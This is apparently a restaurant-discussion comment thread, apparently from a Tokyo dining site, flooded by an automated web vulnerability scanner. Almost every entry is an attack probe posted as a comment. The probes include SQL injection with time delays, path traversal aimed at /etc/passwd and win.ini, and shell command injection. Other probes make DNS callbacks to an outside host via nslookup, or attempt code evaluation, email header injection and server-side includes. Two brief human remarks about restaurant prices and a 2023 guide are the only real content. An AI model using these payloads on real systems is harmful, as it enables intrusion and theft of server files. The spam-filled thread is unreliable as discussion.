.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: guest
WEB-INF/web.xml
re: guest
WEB-INF\web.xml
re: guest
1
re: guest
1
re: guest
-1 OR 2+758-758-1=0+0+0+1 --
re: guest
-1 OR 3+758-758-1=0+0+0+1 --
re: guest
-1 OR 2+643-643-1=0+0+0+1
re: guest
-1 OR 3+643-643-1=0+0+0+1
re: guest
-1' OR 2+693-693-1=0+0+0+1 --
re: guest
-1' OR 3+693-693-1=0+0+0+1 --
re: guest
-1' OR 2+750-750-1=0+0+0+1 or 'KvoWJCrK'='
re: guest
-1' OR 3+750-750-1=0+0+0+1 or 'KvoWJCrK'='
re: guest
-1" OR 2+76-76-1=0+0+0+1 --
re: guest
-1" OR 3+76-76-1=0+0+0+1 --
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
lJucTcg5'; waitfor delay '0:0:15' --
re: guest
-5 OR 271=(SELECT 271 FROM PG_SLEEP(15))--
re: guest
-5) OR 880=(SELECT 880 FROM PG_SLEEP(15))--
re: guest
-1)) OR 778=(SELECT 778 FROM PG_SLEEP(15))--
re: guest
QsqBlCWa' OR 365=(SELECT 365 FROM PG_SLEEP(15))--
re: guest
zELtNmdo') OR 347=(SELECT 347 FROM PG_SLEEP(15))--
re: guest
aq6sGl6t')) OR 429=(SELECT 429 FROM PG_SLEEP(15))--
re: guest
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@Ngc2P
Will Tokiwa's price triple in Hiroo, or just double? :D
Thanks for sharing this link though. Quite notable to me that Hashimoto is now in the "easy to book" department.
re: kk1337
1iZFYNz44O
re: kk1337
response.write(9885763*9204834)
re: kk1337
'+response.write(9885763*9204834)+'
re: kk1337
%0abcc:074625.67-22117.67.b2c6a.19990.2@bxss.me
re: kk1337
"+response.write(9885763*9204834)+"
re: kk1337
to@example.com>%0d%0abcc:074625.67-22118.67.b2c6a.19990.2@bxss.me
re: kk1337
<esi:include src="http://bxss.me/rpb.png"/>
re: kk1337
../../../../../../../../../../../../../../etc/passwd
re: kk1337
${9999952+9999842}
re: kk1337
../../../../../../../../../../../../../../windows/win.ini
re: kk1337
file:///etc/passwd
re: kk1337
../../../../../../../../../../../../../../../proc/version
re: kk1337
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: kk1337
../../../../../../../../../../etc/passwd%00.jpg
re: kk1337
)
re: kk1337
'.gethostbyname(lc('hitiv'.'neuqbwrk0224d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(66).chr(118).chr(70).'
re: kk1337
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: kk1337
!(()&&!|*|*|
re: kk1337
".gethostbyname(lc("hitqc"."ggtojilz4fd15.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(74).chr(109).chr(84)."
re: kk1337
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: kk1337
^(#$!@#$)(()))******
re: kk1337
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: kk1337
/etc/passwd
re: kk1337
echo xlcxmi$()\ ongycg\nz^xyu||a #' &echo xlcxmi$()\ ongycg\nz^xyu||a #|" &echo xlcxmi$()\ ongycg\nz^xyu||a #
re: kk1337
%2fetc%2fpasswd
re: kk1337
HttP://bxss.me/t/xss.html?%00
re: kk1337
&echo pudvxd$()\ oscmdv\nz^xyu||a #' &echo pudvxd$()\ oscmdv\nz^xyu||a #|" &echo pudvxd$()\ oscmdv\nz^xyu||a #
re: kk1337
/.././.././.././.././.././.././.././../etc/./passwd%00
re: kk1337
bxss.me/t/xss.html?%00
re: kk1337
|echo icfnui$()\ qituie\nz^xyu||a #' |echo icfnui$()\ qituie\nz^xyu||a #|" |echo icfnui$()\ qituie\nz^xyu||a #
re: kk1337
"+"A".concat(70-3).concat(22*4).concat(97).concat(82).concat(104).concat(66)+(require"socket"
Socket.gethostbyname("hitta"+"ahegudiy14f80.bxss.me.")[3].to_s)+"
re: kk1337
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: kk1337
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: kk1337
(nslookup hitmpmhsrwdfm44ab4.bxss.me||perl -e "gethostbyname('hitmpmhsrwdfm44ab4.bxss.me')")
re: kk1337
'+'A'.concat(70-3).concat(22*4).concat(104).concat(85).concat(116).concat(75)+(require'socket'
Socket.gethostbyname('hitnx'+'bqdusegyc9c7c.bxss.me.')[3].to_s)+'
re: kk1337
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: kk1337
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: kk1337
$(nslookup hitqqcmcwjuvq5540e.bxss.me||perl -e "gethostbyname('hitqqcmcwjuvq5540e.bxss.me')")
re: kk1337
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: kk1337
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: kk1337
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: kk1337
&nslookup hitwjugshktgmfda73.bxss.me&'\"`0&nslookup hitwjugshktgmfda73.bxss.me&`'
re: kk1337
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: kk1337
Http://bxss.me/t/fit.txt
re: kk1337
'"
re: kk1337
';print(md5(31337));$a='
re: kk1337
&(nslookup hitbtgvphcdrbe6735.bxss.me||perl -e "gethostbyname('hitbtgvphcdrbe6735.bxss.me')")&'\"`0&(nslookup hitbtgvphcdrbe6735.bxss.me||perl -e "gethostbyname('hitbtgvphcdrbe6735.bxss.me')")&`'
re: kk1337
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: kk1337
http://bxss.me/t/fit.txt%3F.jpg
re: kk1337
<!--
re: kk1337
";print(md5(31337));$a="
re: kk1337
|(nslookup hitrboczzlaoudd8d8.bxss.me||perl -e "gethostbyname('hitrboczzlaoudd8d8.bxss.me')")
re: kk1337
file:///etc/passwd
re: kk1337
/etc/shells
re: kk1337
${@print(md5(31337))}
re: kk1337
`(nslookup hitjiniwcesxl8968b.bxss.me||perl -e "gethostbyname('hitjiniwcesxl8968b.bxss.me')")`
re: kk1337
/\../\../\../\../\../\../\../etc/passwd
re: kk1337
c:/windows/win.ini
re: kk1337
${@print(md5(31337))}\
re: kk1337
;(nslookup hitecmxjphxvwd908d.bxss.me||perl -e "gethostbyname('hitecmxjphxvwd908d.bxss.me')")|(nslookup hitecmxjphxvwd908d.bxss.me||perl -e "gethostbyname('hitecmxjphxvwd908d.bxss.me')")&(nslookup hitecmxjphxvwd908d.bxss.me||perl -e "gethostbyname('hitecmxjphxvwd908d.bxss.me')")
re: kk1337
/WEB-INF/web.xml
re: kk1337
bxss.me
re: kk1337
'.print(md5(31337)).'
re: kk1337
C:\WINDOWS\system32\drivers\etc\hosts
re: kk1337
../../../../../../../../../../windows/win.ini%00.jpg
re: kk1337
/../../../../../../../../../../boot.ini
re: kk1337
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: kk1337
..\..\..\..\..\..\..\..\windows\win.ini
re: kk1337
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: kk1337
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: kk1337
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: kk1337
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: kk1337
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: kk1337
WEB-INF/web.xml
re: kk1337
WEB-INF\web.xml
re: kk1337
1
re: kk1337
1
re: kk1337
-1 OR 2+909-909-1=0+0+0+1 --
re: kk1337
-1 OR 3+909-909-1=0+0+0+1 --
re: kk1337
-1 OR 2+90-90-1=0+0+0+1
re: kk1337
-1 OR 3+90-90-1=0+0+0+1
re: kk1337
-1' OR 2+837-837-1=0+0+0+1 --
re: kk1337
-1' OR 3+837-837-1=0+0+0+1 --
re: kk1337
-1' OR 2+205-205-1=0+0+0+1 or 'bnnPS1ht'='
re: kk1337
-1' OR 3+205-205-1=0+0+0+1 or 'bnnPS1ht'='
re: kk1337
-1" OR 2+556-556-1=0+0+0+1 --
re: kk1337
-1" OR 3+556-556-1=0+0+0+1 --
re: kk1337
if(now()=sysdate(),sleep(15),0)
re: kk1337
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: kk1337
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: kk1337
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: kk1337
-1; waitfor delay '0:0:15' --
re: kk1337
-1); waitfor delay '0:0:15' --
re: kk1337
1 waitfor delay '0:0:15' --
re: kk1337
z2C5KgHS'; waitfor delay '0:0:15' --
re: kk1337
-5 OR 670=(SELECT 670 FROM PG_SLEEP(15))--
re: kk1337
-5) OR 805=(SELECT 805 FROM PG_SLEEP(15))--
re: kk1337
-1)) OR 990=(SELECT 990 FROM PG_SLEEP(15))--
re: kk1337
kF0HNFAU' OR 706=(SELECT 706 FROM PG_SLEEP(15))--
re: kk1337
sPXRZj9U') OR 860=(SELECT 860 FROM PG_SLEEP(15))--
re: kk1337
Dj42GBnf')) OR 748=(SELECT 748 FROM PG_SLEEP(15))--
re: kk1337
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: kk1337
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: kk1337
'||(select 1 from (select pg_sleep(15))x)||'
re: kk1337
''||(select 1 from (select pg_sleep(15))x)||''
re: kk1337
1'"
re: kk1337
@@hO1uC
@guest as I noted it was published in 2023. If you have a more up-to-date guide please share it.
re: thetokyogourmet
1CmPkBtVIcO
re: thetokyogourmet
response.write(9445419*9509964)
re: thetokyogourmet
'+response.write(9445419*9509964)+'
re: thetokyogourmet
%0abcc:074625.67-22101.67.6ddaa.19990.2@bxss.me
re: thetokyogourmet
"+response.write(9445419*9509964)+"
re: thetokyogourmet
to@example.com>%0d%0abcc:074625.67-22102.67.6ddaa.19990.2@bxss.me
re: thetokyogourmet
<esi:include src="http://bxss.me/rpb.png"/>
re: thetokyogourmet
${10000320+10000095}
re: thetokyogourmet
../../../../../../../../../../../../../../etc/passwd
re: thetokyogourmet
../../../../../../../../../../../../../../windows/win.ini
re: thetokyogourmet
file:///etc/passwd
re: thetokyogourmet
../../../../../../../../../../../../../../../proc/version
re: thetokyogourmet
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: thetokyogourmet
../../../../../../../../../../etc/passwd%00.jpg
re: thetokyogourmet
'.gethostbyname(lc('hitrl'.'daowoxvt14468.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(79).chr(112).chr(69).'
re: thetokyogourmet
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: thetokyogourmet
)
re: thetokyogourmet
".gethostbyname(lc("hitlc"."jjqkfpbtf0235.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(81).chr(114).chr(74)."
re: thetokyogourmet
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: thetokyogourmet
!(()&&!|*|*|
re: thetokyogourmet
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: thetokyogourmet
^(#$!@#$)(()))******
re: thetokyogourmet
/etc/passwd
re: thetokyogourmet
echo xcraea$()\ ugiomo\nz^xyu||a #' &echo xcraea$()\ ugiomo\nz^xyu||a #|" &echo xcraea$()\ ugiomo\nz^xyu||a #
re: thetokyogourmet
&echo wuzkdr$()\ ksmdzi\nz^xyu||a #' &echo wuzkdr$()\ ksmdzi\nz^xyu||a #|" &echo wuzkdr$()\ ksmdzi\nz^xyu||a #
re: thetokyogourmet
%2fetc%2fpasswd
re: thetokyogourmet
|echo mxfhby$()\ qziaax\nz^xyu||a #' |echo mxfhby$()\ qziaax\nz^xyu||a #|" |echo mxfhby$()\ qziaax\nz^xyu||a #
re: thetokyogourmet
/.././.././.././.././.././.././.././../etc/./passwd%00
re: thetokyogourmet
(nslookup hitoyiodgfbxbe312e.bxss.me||perl -e "gethostbyname('hitoyiodgfbxbe312e.bxss.me')")
re: thetokyogourmet
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
